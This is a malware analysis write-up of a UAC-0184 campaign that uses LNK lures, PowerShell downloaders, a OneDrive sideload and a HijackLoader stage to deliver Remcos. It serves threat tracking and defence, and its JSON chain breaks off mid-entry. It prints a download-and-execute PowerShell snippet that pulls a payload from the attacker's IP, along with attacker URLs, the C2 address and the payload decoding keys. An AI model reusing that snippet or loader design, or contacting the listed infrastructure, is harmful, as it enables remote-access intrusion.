by Robin Dost
Malware: HijackLoader / IDATLoader -> Remcos Agent 7.1.0 Pro
Actor tracking: UAC-0184 / MB-0005
Related analysis: UAC-0184: From HTA to a Signed Network Stack
A YARA rule for this sample is available on request: contact@robin-dost.de.
In my previous UAC-0184 analysis, I documented a loader chain built around a legitimate Plane9 application, several local payload containers and a pseudo-PNG file carrying additional stages inside its IDAT chunks.
That chain eventually unpacked a collection of signed utilities and a PassMark network component.
The sample analyzed in this article uses a visibly different delivery package and ends with a much clearer final payload.
Plane9 has been replaced with Microsoft OneDrive components, the local container names have changed and the campaign now delivers a fully configured Remcos Agent.
Underneath those changes, however, much of the loader architecture remains familiar.
The result is a useful example of tooling evolution for us: the exterior rotated, while the more expensive internal loading pipeline was retained.
Starting with the initial archive
The initial archive is named:
spisokszch.zipwith the SHA256
c74bb6fb848cdb87c2b4261da1efc078023cdf95aa7b1436c52c26f3a11025afIt contains five files:
JPG_012.jpg.lnk
JPG_013.jpg.lnk
JPG_014.jpg.lnk
spisokszch.xlsx.lnk
README.txtDespite their names, none of the four apparent image or spreadsheet files are actual documents.
They are Windows shortcut files.
The archive therefore presents the victim with three apparent JPG images and one Excel workbook, while Windows may hide the final .lnk extension depending on the local Explorer configuration.
The accompanying README.txt is written in Ukrainian and instructs the recipient to extract the files to the desktop before opening them:
Інструкція як відкрити файли
1. Витягніть їх з архіву (розпакуйте) на робочий стіл. Якщо Ви будете відкривати їх всередині архіву, то вони не відкриються
2. Двічі клацніть по розпакованих файлах
--- EN
Instructions for opening the files:
1. Extract them from the archive to the desktop.
They will not open if launched from inside the archive.
2. Double-click the extracted files.
This instruction is operationally useful for the attacker.
Launching shortcuts directly from an archive can behave differently depending on the archive utility and extraction context. Asking the victim to extract everything first ensures that the LNK files are placed together on disk and executed in a predictable environment.
It also gives the request a legitimate explanation: the files supposedly need to be unpacked because they cannot be opened from inside the ZIP.
Four lures, one execution pattern
Each LNK launches cmd.exe with delayed variable expansion enabled.
The command reconstructs the string:
MSXML2.XMLHTTPfrom two smaller variables:
MSXM
L2.XMLIt then writes a temporary VBScript that:
- creates an
MSXML2.XMLHTTPobject; - performs an HTTP GET request;
- sets a Windows PowerShell-style User-Agent;
- writes the response using
ADODB.Stream; - saves it as a temporary
.ps1file.
The shortcut subsequently executes the VBScript through cscript, launches the downloaded PowerShell file with a hidden window and deletes both temporary files.
The effective flow is:
The split strings and wildcard-heavy Get-Command expression are not sophisticated obfuscation.
They are enough, however, to break simple searches for complete API names or common PowerShell download commands.
The four shortcuts reference four separate PowerShell URLs:
JPG_012.jpg.lnk
-> http://144.31.236.240/szch45/ritecommunion.ps1
JPG_013.jpg.lnk
-> http://144.31.236.240/szch45/shoutnewspaper.ps1
JPG_014.jpg.lnk
-> http://144.31.236.240/szch45/hintprefix.ps1
spisokszch.xlsx.lnk
-> http://144.31.236.240/szch45/collectivisationgown.ps1
The PowerShell downloaders
The recovered PowerShell stages are almost identical.
They first check whether the secondary archive already exists:
szch45clusterhum.zipIf it does not, they download it from:
http://144.31.236.240/szch45clusterhum.zipThe scripts use an obfuscated Get-Command expression to resolve Invoke-WebRequest, then save the ZIP into the current working directory.
They subsequently extract the archive into:
MSWinDistroFinally, they execute:
MSWinDistro/ClusterHub.exeand open one of the decoy images / document included in the downloaded ZIP.
The difference between the recovered scripts is the decoy selected after execution:
ritecommunion.ps1
-> JPG_012.jpg
shoutnewspaper.ps1
-> JPG_013.jpg
hintprefix.ps1
-> JPG_014.jpg
collectivisationgown.ps1
-> spisokszch.xlsxThe behavior can be simplified to:
if (!(Test-Path "szch45clusterhum.zip")) {
Invoke-WebRequest `
-Uri "http://144.31.236.240/szch45clusterhum.zip" `
-OutFile "szch45clusterhum.zip"
}
Expand-Archive `
"szch45clusterhum.zip" `
-DestinationPath "MSWinDistro"
Start-Process "MSWinDistro/ClusterHub.exe"
Start-Process "MSWinDistro/JPG_012.jpg"
The scripts subsequently execute:
MSWinDistro/ClusterHub.exeand attempt to open one of the files carrying a .jpg extension.
The difference between the two recovered scripts is the selected file:
ritecommunion.ps1
-> JPG_012.jpg
shoutnewspaper.ps1
-> JPG_013.jpgHowever, the files are not valid JPEG images.
Their headers resemble deliberately corrupted or incomplete PNG signatures and standard file identification reports them only as generic data.
The PowerShell start command therefore only proves that Windows is instructed to open the files through the registered .jpg handler. It does not prove that a valid image is displayed to the victim.
No static reference indicating that ClusterHub.exe repairs or decrypts these files was identified in the analyzed loader components.
They may serve as malformed decoys, auxiliary containers or artifacts intended to create visible activity while the sideload chain starts in parallel.
Delivery and C2 on the same server
The IP address:
144.31.236.24appears throughout the chain.
It hosts:
/szch45/ritecommunion.ps1
/szch45/shoutnewspaper.ps1
/szch45/hintprefix.ps1
/szch45/collectivisationgown.ps1
/szch45clusterhum.zipThe final Remcos configuration also points back to the same address:
144.31.236.240:27018This means the observed server performs at least two operational roles:
HTTP payload delivery
-> TCP Remcos command and controlThere is no domain, redirector or separate delivery layer in the recovered artifacts.
The shortcuts connect directly to an IP address, the PowerShell scripts retrieve the second archive directly from the same IP and the final payload is configured to use that IP for C2.
From an operational-security perspective, this is convenient but noisy.
A single infrastructure indicator links the initial downloader, the secondary archive and the final malware controller.
I’m familiar with this subnet (AS202226) and fairly confident about the provider behind this IP address: h2.nexus.
They offer cheap Windows Server hosting that can be paid for via cryptocurrency and they also support anonymous purchases through a Telegram bot.
In the last few samples i’ve analyzed they used a different Provider (Kraken-Network ISP).
This was consistent for some time now, but now we see a change, this change also has to do with the deployment of Remcos V2, because they need a Windows VPS for hosting their C2 Center.
The full chain
The complete execution sequence becomes:
Yeah, i know, the chain is long…
… but each layer solves a specific problem:
- the initial ZIP provides the lure context;
- the LNK files hide executable command lines behind document names;
- the temporary VBScript performs the first download;
- PowerShell downloads and extracts the larger package;
- the legitimate OneDrive binary provides the sideload host;
- local
.symand.mapfiles hide the encoded stages; - the HijackLoader bundle handles modular execution;
- Remcos provides the final remote-access capability.
Inside szch45clusterhum.zip
The second archive contains the following relevant files:
ClusterHub.exe
LoggingPlatform.dll
UpdateRingSettings.dll
monitor_base.sym
physicsdesc.map
JPG_012.jpg
JPG_013.jpg
JPG_014.jpg
spisokszch.xlsxIt also contains several Microsoft Visual C++ runtime libraries:
msvcp140.dll
msvcp_win.dll
ucrtbase.dll
vcruntime140.dll
vcruntime140_1.dllThis makes the directory look like a self-contained Windows application package.
The filenames UpdateRingSettings.dll and LoggingPlatform.dll fit naturally into a Microsoft software environment. The .sym and .map extensions can easily be dismissed as symbols, diagnostics or application metadata.
The decoy files also match the names presented by the original shortcuts.
The initial lure archive contains:
JPG_012.jpg.lnkwhile the downloaded archive contains:
JPG_012.jpgThe PowerShell stage starts the malware and then opens the corresponding real image.
It’s actually not only filename masquerading, it’s a complete handoff from a fake shortcut to the real decoy document.
The OneDrive disguise
ClusterHub.exe is not a custom loader built from scratch.
Internally, it contains extensive Microsoft OneDrive and OneDrive Patcher strings, including:
OneDrivePatcher.exe
Microsoft.OneDrive.Sync.Client
UpdateRingSettings.dll
LoggingPlatform.DLL
The associated DLLs also retain legitimate-looking OneDrive symbols and type information.
This gives the package a much cleaner appearance than a random unsigned executable surrounded by several encrypted payloads.
ClusterHub.exe loads UpdateRingSettings.dll, which acts as the malicious loader component. LoggingPlatform.dll is also part of the local dependency chain and appears to preserve or forward expected functionality.
The attacker therefore did not only choose a signed executable that happens to search its local directory for a DLL.
They packaged the malicious loader inside a coherent collection of OneDrive-related components.
That is the first major visual change compared with the previous sample.
The earlier chain used a Plane9 application, the new chain uses Microsoft OneDrive software.
The two files that matter
The main local payload containers are:
monitor_base.sym
physicsdesc.mapNeither file is what its extension suggests.
Both begin with large amounts of printable filler, making them appear text-like when inspected superficially.
The relevant structures are located further inside the files.
The local loading sequence can be reduced to:
This is where the similarities to the previous UAC-0184 sample become difficult to ignore.
monitor_base.sym: the small loader stage
monitor_base.sym is approximately 35 KB.
Most of its beginning consists of filler.
At offset 0x6BD8, the file contains a small structure describing the encoded payload:
Decoded size: 0x2084
Key: 0x3A12EA50The following data is decoded by adding the key to each 32-bit value.
The result is 8,324 bytes of x64 shellcode.
No complex encryption is involved at this stage.
It is a simple DWORD addition operation.
The decoded shellcode contains several useful strings:
tapisrv.dll
IDAT
IEND
PNG
GET
http
Rtl...The IDAT, IEND and PNG strings reveal the purpose of the next stage.
The shellcode searches for and processes PNG-style chunks inside physicsdesc.map.
The references beginning with Rtl also lead to the later use of RtlDecompressBuffer.
physicsdesc.map: another image that is not an image
The larger physicsdesc.map file is approximately 1.36 MB.
It does not begin with a valid PNG signature.
Instead, the file starts with another large filler region. The first real PNG-style IDAT chunk appears at offset:
0x4052
From this position onward, the file contains:
164 × IDAT chunks
1 × IEND chunk
Most IDAT chunks contain 8,192 bytes.
The file is not a valid image, but enough of the internal PNG chunk structure is retained for the shellcode to parse it.
The loader searches using a pattern equivalent to:
????IDATThe four wildcard bytes correspond to the big-endian chunk length preceding the IDAT type.
The shellcode concatenates the data areas of all matching chunks and interprets the first 16 bytes of the resulting stream as metadata.
For this sample, the recovered values are:
Marker: 0xEA79A5C6
DWORD XOR key: 0x54EBEC5E
Compressed size: 0x145E3A
Decompressed size: 0x20AE58The following payload data is XORed DWORD by DWORD using:
0x54EBEC5EThe XOR output is then decompressed using:
RtlDecompressBuffer
CompressionFormat = 2Compression format 2 corresponds to:
COMPRESSION_FORMAT_LZNT1The final decompressed bundle is approximately 2.14 MB.
The same loader architecture
This is the clearest technical connection to the previous sample.
The earlier chain:
The new chain:
The values changed:
- different filenames;
- different offsets;
- different arithmetic keys;
- different XOR keys;
- different IDAT count;
- different decompressed payload.
The architecture did not.
Both chains use:
- a small local file containing arithmetic-encoded shellcode;
- a larger secondary container with a printable filler prefix;
- PNG-style
IDATchunks without a valid PNG header; - concatenation of chunk data;
- fixed 32-bit XOR decoding;
- Windows LZNT1 decompression;
- a larger modular payload bundle;
- execution through a legitimate software package.
This is a much more useful tracking characteristic than a filename or hash.
Hashes disappear when the sample is rebuilt.
The loader architecture requires actual development work to replace.
A 35-module HijackLoader bundle
The decompressed output contains a table of 35 named modules.
Relevant entries include:
LauncherLdr64
modCreateProcess
modCreateProcess64
modTask
modTask64
modUAC
modUAC64
modWD
modWD64
modWriteFile
modWriteFile64
rshell
rshell64
ti
ti64
CUSTOMINJECT
CUSTOMINJECTPATH
PERSDATA
The module names expose the frameworks modular design.
There are separate 32-bit and 64-bit components for:
- process creation;
- scheduled-task execution;
- UAC-related functionality;
- Windows Defender interaction;
- writing files;
- reverse-shell execution;
- custom injection.
The observed format is consistent with HijackLoader, also tracked as IDATLoader.
The IDAT container is therefore not an isolated packer trick.
It belongs to a wider modular loader framework that can deploy different components and final payloads depending on its configuration.
Embedded PE files inside the loader bundle
The 35 module entries do not represent 35 standalone executables.
Many of them are shellcode fragments, configuration blocks or small architecture-specific routines. However, a structural scan of the fully decompressed HijackLoader bundle recovered eight complete PE files.
These files were carved from the same LZNT1-decompressed bundle described above, not from the final Remcos payload.
| Embedded PE | Architecture | Internal role or identification |
|---|---|---|
tcpvcon.exe | x86 | Microsoft Sysinternals TCPView Console |
FIXED | x86 | Info-ZIP-based archive utility |
LauncherLdr64 | x64 | 64-bit launcher component |
tinystub | x86 | 32-bit execution stub |
tinystub64 | x64 | 64-bit execution stub |
tinyutilitymodule.dll | x86 | 32-bit utility DLL |
tinyutilitymodule64.dll | x64 | 64-bit utility DLL |
CUSTOMINJECT | x86 GUI | HearthstoneDeckTracker.exe, likely used as the CUSTOMINJECT host |
These files were carved from the fully decompressed HijackLoader bundle, not from the final Remcos payload.
Seven of the eight PE offsets correspond directly to entries in the recovered 35-module table.
The exception is tcpvcon.exe, which is stored near the beginning of the decompressed bundle before the named module data.
The first embedded executable is the legitimate Microsoft Sysinternals TCPView Console utility. Its original strings and license resources remain intact, including:
Usage: tcpvcon [-a] [-c] [-n] [process name or PID]The module named FIXED contains Info-ZIP strings and appears to be a bundled or modified ZIP command-line utility.
The remaining binaries form part of the loaders execution and injection framework, with separate components for 32-bit and 64-bit systems.
The final carved PE is a legitimate copy of HearthstoneDeckTracker.exe. Its placement within the bundle suggests that it may be used as a host process for the loaders CUSTOMINJECT execution path, rather than being the injector itself.
Importantly, this executable is not the final Remcos payload!
Remcos is stored separately in an encrypted tail region and only becomes a valid PE after applying the repeating 200-byte XOR layer and removing the leading key area.
This distinction shows that the decompressed stage is not simply a packed RAT. It is a complete deployment framework containing legitimate utilities, architecture-specific loaders, execution stubs and a signed host process for custom injection around the separately encrypted final payload.
A retained internal deployment path
One configuration value is especially interesting:
%windir%\SysWOW64\input.dllThe same destination also appeared in the previous UAC-0184 sample.
In the earlier chain, input.dll belonged to the PassMark-based execution stack and was deployed together with VSLauncher.exe.
The new loader bundle again contains the same input.dll path.
This is a stronger tooling connection than the generic use of DLL sideloading.
The external software stack changed from Plane9 to OneDrive, but part of the internal deployment logic remained intact.
That is often how real tooling evolution looks.
Operators rotate the components most visible to defenders while retaining internal routines, path conventions and loader modules that continue to work.
The final encrypted region
The modular bundle contains another encrypted area of approximately 514 KB.
Its first 200 bytes form the XOR key.
Applying those 200 bytes cyclically to the complete encrypted region turns the key area into zeroes. A valid PE file begins immediately afterward at offset:
0xC8The recovered executable identifies itself as:
Remcos Agent 7.1.0 ProUnlike the final stage in the previous sample, this leaves little ambiguity about the intended capability.
HijackLoader handles staging and execution.
Remcos provides the remote-access functionality.
Recovering the Remcos configuration
The Remcos executable contains a resource named:
SETTINGSThe resource uses RC4 encryption and follows a simple structure:
1 byte key length
62 bytes RC4 key
remaining encrypted configurationDecrypting the resource produces 58 configuration fields.
Relevant values include:
C2: 144.31.236.240:27018
Install filename: remcos.exe
Mutex: Rmc-X5JFP2
Log filename: logs.dat
Screenshot path: Screenshots
Microphone path: MicRecordsThe key difference from the previous sample is the presence of a clear, statically recoverable controller.
The earlier PassMark-based bundle did not expose an unambiguous external C2 endpoint in the analyzed artifacts.
This Remcos configuration does:
144.31.236.240:27018The address is the same server used by the LNK shortcuts and PowerShell downloaders.
The decoy material
The secondary archive includes three image files:
JPG_012.jpg
JPG_013.jpg
JPG_014.jpgand one spreadsheet:
spisokszch.xlsx
The Excel sheet spisokszch.xlsx is an internal Ukrainian military roster of AWOL/desertion cases (СЗЧ): 39 soldiers with names, ranks, AWOL dates, order and criminal case number and status.
In this redacted version, all names, case/order numbers and unit IDs are removed by me, since I don’t know if this file is authentic.
These file names correspond directly to the initial LNK lures.
The recovered PowerShell scripts explicitly open either JPG_012.jpg or JPG_013.jpg after starting ClusterHub.exe.
The images therefore serve as visible decoys.
The spreadsheet is a valid workbook containing a single sheet with 108 used rows.
Its content relates to Ukrainian military administration and includes fields such as:
- military rank;
- full name;
- date of unauthorized absence;
- date of return;
- appointment and result order numbers;
- referrals to the State Bureau of Investigation;
- ERDR case information;
- current location or status.
The workbook contains personal information, so individual rows and names are intentionally not reproduced here.
The targeting context is nevertheless clear.
It relates to Ukrainian military personnel and unauthorized absence cases.
The document may have been created as a tailored lure, modified from an existing document or reused after being obtained elsewhere.
The artifact alone does not establish which scenario is correct.
It does demonstrate that the delivery package was prepared for a specific Ukrainian military-administrative audience.
What changed from the previous sample?
The tooling evolution becomes easier to see side by side.
| Component | Previous sample | New sample |
|---|---|---|
| Initial lure | LNK leading to gated HTA stages | ZIP containing four document-named LNK files |
| First downloader | bitsadmin / mshta.exe | cmd.exe → temporary VBScript → PowerShell |
| Delivery server | 169.40.135.35 | 144.31.236.240 |
| Secondary archive | dctrprraclus.zip | szch45clusterhum.zip |
| Extraction directory | %APPDATA%\ApplicationData32 | MSWinDistro |
| Visible host | Plane9 / Cluster-Overlay64.exe | OneDrive Patcher renamed ClusterHub.exe |
| Loader DLLs | Plane9Engine.dll, openvr_api.dll, evr.dll | UpdateRingSettings.dll, LoggingPlatform.dll |
| Small container | kernel-diag.lib | monitor_base.sym |
| Large container | filter.bin | physicsdesc.map |
| Container design | Fake prefix plus PNG IDAT chunks | Fake prefix plus PNG IDAT chunks |
| Initial decoding | DWORD addition | DWORD addition |
| Main decoding | DWORD XOR | DWORD XOR |
| Compression | LZNT1 | LZNT1 |
| Bundle | Eight carved PEs and PassMark stack | 35 named HijackLoader modules |
| Reused path | %windir%\SysWOW64\input.dll | %windir%\SysWOW64\input.dll |
| Final capability | Signed network-capable utility stack | Remcos Agent 7.1.0 Pro |
| Static C2 | Not recovered | 144.31.236.240:27018 |
The delivery mechanism changed more substantially than the internal decoding pipeline.
The previous chain relied on HTA files and a gated delivery path.
The new sample uses document-named shortcuts, a temporary VBScript downloader and small PowerShell stages
Once ClusterHub.exe starts, however, the chain returns to a familiar design.
This suggests that the delivery mechanism and the core loader can be changed independently.
The actor can replace the initial access package without rebuilding the complete payload framework.
Infrastructure Intelligence Model chain
The observed infrastructure and artifact flow can be represented as the following IIM chain:
[ENTRY]
spisokszch.zip
├── README.txt
├── JPG_012.jpg.lnk
├── JPG_013.jpg.lnk
├── JPG_014.jpg.lnk
└── spisokszch.xlsx.lnk
[STAGING]
JPG_012.jpg.lnk
└── downloads /szch45/ritecommunion.ps1
JPG_013.jpg.lnk
└── downloads /szch45/shoutnewspaper.ps1
JPG_014.jpg.lnk
└── downloads /szch45/hintprefix.ps1
spisokszch.xlsx.lnk
└── downloads /szch45/collectivisationgown.ps1
[DELIVERY INFRASTRUCTURE]
144.31.236.240
├── hosts PowerShell stages
└── hosts /szch45clusterhum.zip
[SECONDARY STAGING]
PowerShell stage
└── downloads szch45clusterhum.zip
├── ClusterHub.exe
├── UpdateRingSettings.dll
├── LoggingPlatform.dll
├── monitor_base.sym
└── physicsdesc.map
[LOADER PIPELINE]
ClusterHub.exe
└── executes UpdateRingSettings.dll
└── decodes monitor_base.sym
└── parses physicsdesc.map
└── reconstructs HijackLoader bundle
[PAYLOAD]
HijackLoader bundle
└── decodes Remcos Agent 7.1.0 Pro
[C2]
Remcos
└── 144.31.236.240:27018
(IIM view in KRAKEN)
If you want to work with the chain yourself, here’s the JSON.
Click to view Chain as JSON
{
"actor_id": "UAC-0184",
"attack_annotations": [
{
"name": "Malicious File",
"technique_id": "T1204.002"
},
{
"name": "PowerShell",
"technique_id": "T1059.001"
},
{
"name": "Mshta / signed binary proxy execution context not used in this sample; retained only for comparison",
"technique_id": "T1218.005",
"x_comparison_only": true
},
{
"name": "DLL Side-Loading",
"technique_id": "T1574.002"
},
{
"name": "Deobfuscate/Decode Files or Information",
"technique_id": "T1140"
},
{
"name": "Embedded Payloads",
"technique_id": "T1027.009"
},
{
"name": "Process Injection",
"technique_id": "T1055"
}
],
"chain": [
{
"entity_id": "e_initial_zip",
"role": "entry",
"role_confidence": "confirmed",
"technique_confidence": "confirmed",
"techniques": [
"IIM-T024"
]
},
{
"entity_id": "e_readme",
"role": "entry",
"role_confidence": "confirmed",
"techniques": []
},
{
"entity_id": "e_lnk_012",
"role": "entry",
"role_confidence": "confirmed",
"techniques": []
},
{
"entity_id": "e_lnk_013",
"role": "entry",
"role_confidence": "confirmed",
"techniques": []
},
{
"entity_id": "e_lnk_014",
"role": "entry",
"role_confidence": "confirmed",
"techniques": []
},
{
"entity_id": "e_lnk_xlsx",
"role": "entry",
"role_confidence": "confirmed",
"techniques": []
},
{
"entity_id": "e_ps1_rite_url",
"role": "staging",
"role_confidence": "confirmed",
"techniques": []
},
{
"entity_id": "e_ps1_shout_url",
"role": "staging",
"role_confidence": "confirmed",
"techniques": []
},
{
"entity_id": "e_ps1_hint_url",
"role": "staging",
"role_confidence": "confirmed",
"techniques": []
},
{
"entity_id": "e_ps1_collect_url",
"role": "staging",
"role_confidence": "confirmed",
"techniques": []
},
{
"entity_id": "e_rite_ps1",
"role": "staging",
"role_confidence": "confirmed",
"techniques": []
},
{
"entity_id": "e_shout_ps1",
"role": "staging",
"role_confidence": "confirmed",
"techniques": []
},
{
"entity_id": "e_delivery_ip",
"role": "staging",
"role_confidence": "confirmed",
"techniques": []
},
{
"entity_id": "e_payload_zip_url",
"role": "staging",
"role_confidence": "confirmed",
"technique_confidence": "likely",
"techniques": [
"IIM-T024"
]
},
{
"entity_id": "e_payload_zip",
"role": "staging",
"role_confidence": "confirmed",
"technique_confidence": "confirmed",
"techniques": [
"IIM-T024"
]
},
{
"entity_id": "e_clusterhub",
"role": "staging",
"role_confidence": "confirmed",
"techniques": []
},
{
"entity_id": "e_update",
"role": "staging",
"role_confidence": "confirmed",
"techniques": []
},
{
"entity_id": "e_logging",
"role": "staging",
"role_confidence": "likely",
"techniques": []
},
{
"entity_id": "e_monitor",
"role": "staging",
"role_confidence": "confirmed",
"technique_confidence": "tentative",
"techniques": [
"IIM-T025"
]
},
{
"entity_id": "e_shellcode",
"role": "staging",
"role_confidence": "confirmed",
"techniques": []
},
{
"entity_id": "e_physics",
"role": "staging",
"role_confidence": "confirmed",
"technique_confidence": "tentative",
"techniques": [
"IIM-T025"
]
},
{
"entity_id": "e_idat_stream",
"role": "staging",
"role_confidence": "confirmed",
"techniques": []
},
{
"entity_id": "e_hijack_bundle",
"role": "staging",
"role_confidence": "confirmed",
"techniques": []
},
{
"entity_id": "e_inputdll",
"role": "staging",
"role_confidence": "likely",
"techniques": []
},
{
"entity_id": "e_remcos",
"role": "payload",
"role_confidence": "confirmed",
"techniques": []
},
{
"entity_id": "e_c2",
"role": "c2",
"role_confidence": "confirmed",
"techniques": []
}
],
"chain_id": "uac-0184-onedrive-sideload-remcos-2026-06",
"confidence": "confirmed",
"description": "Ukraine-themed archive containing document- and image-named LNK files. The shortcuts retrieve PowerShell downloaders from 144.31.236.240, which download and extract szch45clusterhum.zip, execute a OneDrive Patcher-based sideload chain, decode local pseudo-PNG IDAT containers through DWORD arithmetic and LZNT1, load a 35-module HijackLoader bundle and recover Remcos Agent 7.1.0 Pro configured for 144.31.236.240:27018.",
"entities": [
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_initial_zip",
"type": "file",
"value": "spisokszch.zip",
"x_sha256": "c74bb6fb848cdb87c2b4261da1efc078023cdf95aa7b1436c52c26f3a11025af"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_readme",
"type": "file",
"value": "README.txt",
"x_language": "Ukrainian",
"x_lure_instruction": "Extract the files to the desktop and open them outside the archive",
"x_sha256": "86bac1444fef0b07eec10dcd4a5859a2296954f6b5a36690dc7c27e2931b9ccc"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_lnk_012",
"type": "file",
"value": "JPG_012.jpg.lnk",
"x_sha256": "bb40c9d8c217516a92a18a1bdb080a5af92cfafe81f6751dea665e3e78cb4851"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_lnk_013",
"type": "file",
"value": "JPG_013.jpg.lnk",
"x_sha256": "fe38e54bedee074825eb3fcbe4824ed203876692a424e0c183e0006b31d1b7a8"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_lnk_014",
"type": "file",
"value": "JPG_014.jpg.lnk",
"x_sha256": "a8d0a03543db29d279175c9679eba574dcb7a17e306195a68ab1d033ee2be01c"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_lnk_xlsx",
"type": "file",
"value": "spisokszch.xlsx.lnk",
"x_sha256": "6754f3854680767a394b22090f277fc53ec5a242faff54bf233084da5989c3ef"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_ps1_rite_url",
"type": "url",
"value": "http://144.31.236.240/szch45/ritecommunion.ps1"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_ps1_shout_url",
"type": "url",
"value": "http://144.31.236.240/szch45/shoutnewspaper.ps1"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_ps1_hint_url",
"type": "url",
"value": "http://144.31.236.240/szch45/hintprefix.ps1"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_ps1_collect_url",
"type": "url",
"value": "http://144.31.236.240/szch45/collectivisationgown.ps1"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_rite_ps1",
"type": "file",
"value": "ritecommunion.ps1",
"x_decoy": "JPG_012.jpg",
"x_sha256": "adf2c6f80229677615358b56f329aba9c3e9e009d9ca6d6deb0b805e6e212dbc"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_shout_ps1",
"type": "file",
"value": "shoutnewspaper.ps1",
"x_decoy": "JPG_013.jpg",
"x_sha256": "43579dd80314b6de4a1ca4e40b53ef0376a2ab55d50c8368e0b26af0af0d08c7"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_delivery_ip",
"type": "ip",
"value": "144.31.236.240",
"x_delivery_paths": [
"/szch45/ritecommunion.ps1",
"/szch45/shoutnewspaper.ps1",
"/szch45/hintprefix.ps1",
"/szch45/collectivisationgown.ps1",
"/szch45clusterhum.zip"
]
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_payload_zip_url",
"type": "url",
"value": "http://144.31.236.240/szch45clusterhum.zip"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_payload_zip",
"type": "file",
"value": "szch45clusterhum.zip",
"x_sha256": "fee96a66a8c143ff4f172963a56a813427a65dad7758834bb3283685a37df633"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_clusterhub",
"type": "file",
"value": "ClusterHub.exe",
"x_execution_path": "MSWinDistro/ClusterHub.exe",
"x_legitimate_software": "Microsoft OneDrive Patcher",
"x_sha256": "a11339f52a3b31d5a1f134e19bfc83d260ccbde4f14b14889bd824cc636c9a93"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_update",
"type": "file",
"value": "UpdateRingSettings.dll",
"x_role_note": "Sideloaded loader DLL",
"x_sha256": "da48273d7d4ab1d71ecf50fec0a58884ddb2baf18d872f25cab3637519ef71d7"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_logging",
"type": "file",
"value": "LoggingPlatform.dll",
"x_role_note": "Companion/forwarder DLL",
"x_sha256": "c0713fd808170f2204a9bc091288e358c5f3266bf99a44f3a36a7ccc03732bb1"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_monitor",
"type": "file",
"value": "monitor_base.sym",
"x_decoder": "DWORD addition at offset 0x6BD8; decoded size 0x2084; key 0x3A12EA50"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_shellcode",
"type": "file",
"value": "monitor_base.sym decoded x64 shellcode",
"x_parser_marker": "????IDAT",
"x_size_bytes": 8324,
"x_stomping_library": "tapisrv.dll"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_physics",
"type": "file",
"value": "physicsdesc.map",
"x_first_idat_offset": "0x4052",
"x_format": "Noise prefix followed by 164 PNG-style IDAT chunks and IEND"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_idat_stream",
"type": "file",
"value": "physicsdesc.map concatenated IDAT stream",
"x_compressed_size": "0x145E3A",
"x_compression": "LZNT1",
"x_decompressed_size": "0x20AE58",
"x_dword_xor_key": "0x54EBEC5E",
"x_marker": "0xEA79A5C6"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_hijack_bundle",
"type": "file",
"value": "HijackLoader / IDATLoader modular bundle",
"x_module_count": 35,
"x_modules": [
"ti",
"ti64",
"rshell",
"rshell64",
"modUAC",
"modUAC64",
"modWD",
"modWD64",
"modTask",
"modTask64",
"modWriteFile",
"modWriteFile64",
"CUSTOMINJECT",
"PERSDATA"
]
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_inputdll",
"type": "file",
"value": "%windir%\\SysWOW64\\input.dll",
"x_role_note": "Configured module-stomping/deployment target also observed in the previous UAC-0184 sample"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
"id": "e_remcos",
"type": "file",
"value": "Remcos Agent 7.1.0 Pro",
"x_config_cipher": "RC4",
"x_config_resource": "SETTINGS",
"x_install_filename": "remcos.exe",
"x_mutex": "Rmc-X5JFP2",
"x_sha256": "40079f05ba7cdccac1f62f8e7e1b644bc0a806b58465f5c005725bc54ee73ef1"
},
{
"evidence": [
"https://blog.synapticsystems.de/uac-0184-tooling-evolution-onedrive-sideload-to-remcos/"
],
